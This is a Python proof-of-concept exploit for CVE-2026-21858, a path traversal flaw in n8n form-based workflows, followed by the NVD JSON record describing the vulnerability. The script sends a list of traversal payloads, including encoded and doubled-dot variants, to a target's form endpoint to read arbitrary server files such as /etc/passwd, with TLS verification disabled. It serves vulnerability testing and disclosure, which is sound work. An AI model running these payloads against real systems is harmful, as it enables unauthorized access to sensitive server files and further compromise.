CVE-2026-21858

#!/usr/bin/env python3 """ CVE-2026-21858 PoC - n8n Sensitive Information Disclosure This PoC demonstrates how to exploit the path traversal vulnerability in n8n to read arbitrary files from the server filesystem. Usage: python3 cve-2026-21858_poc.py --url http://target-n8n:5678 --workflow-id <id> --file /etc/passwd Note: This is for educational and authorized testing purposes only. """ import argparse import requests import urllib.parse import json import sys def exploit_path_traversal(base_url, workflow_id, target_file): """ Attempt to exploit the path traversal vulnerability in n8n forms. Args: base_url: Base URL of the n8n instance workflow_id: ID of a vulnerable form-based workflow target_file: Path to the file to read (e.g., /etc/passwd) """ # Construct the form submission endpoint form_endpoint = f"{base_url.rstrip('/')}/form/{workflow_id}" # Common path traversal patterns traversal_patterns = [ target_file, f"../../../../..{target_file}", f"..%2F..%2F..%2F..%2F{target_file.lstrip('/').replace('/', '%2F')}", f"....//....//....//....//{target_file.lstrip('/')}", f"..\..\..\..\{target_file}" ] print(f"[*] Target: {form_endpoint}") print(f"[*] Attempting to read: {target_file}") print("-" * 60) for i, payload in enumerate(traversal_patterns, 1): print(f"\n[*] Attempt {i} with payload: {payload}") # Construct the form data # The exact structure depends on the specific vulnerable workflow form_data = { "data": { "filePath": payload, "operation": "read" } } try: response = requests.post( form_endpoint, json=form_data, headers={ "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" }, timeout=10, verify=False ) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: try: result = response.json() if result.get('success') or 'data' in result: print("[+] VULNERABLE! File content retrieved:") print("-" * 40) print(result.get('data', result)) return True except json.JSONDecodeError: if len(response.text) > 0: print("[+] Potential file content found:") print(response.text[:500]) return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[-] Exploitation attempts completed. Target may not be vulnerable.") return False def main(): parser = argparse.ArgumentParser( description='CVE-2026-21858 PoC - n8n Path Traversal' ) parser.add_argument('--url', required=True, help='Base URL of n8n instance') parser.add_argument('--workflow-id', required=True, help='ID of form workflow') parser.add_argument('--file', default='/etc/passwd', help='File path to read') args = parser.parse_args() success = exploit_path_traversal(args.url, args.workflow_id, args.file) if success: print("\n[!] Target is vulnerable to CVE-2026-21858") print("[!] Recommended action: Upgrade to n8n >= 1.121.0") sys.exit(0) else: print("\n[-] Target does not appear to be vulnerable") sys.exit(1) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-21858", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:59.990", "lastModified": "2026-01-16T19:31:34.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. Las versiones a partir de la 1.65.0 y anteriores a la 1.121.0 permiten a un atacante acceder a archivos en el servidor subyacente mediante la ejecución de ciertos flujos de trabajo basados en formularios. Un flujo de trabajo vulnerable podría conceder acceso a un atacante remoto no autenticado, lo que resultaría en la exposición de información sensible almacenada en el sistema y podría permitir un mayor compromiso dependiendo de la configuración de despliegue y el uso del flujo de trabajo. Este problema está solucionado en la versión 1.121.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "1.65.0", "versionEndExcluding": "1.121.0", "matchCriteriaId": "A90AFDBB-31A3-41C0-8E53-8D10D9FB47C3"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}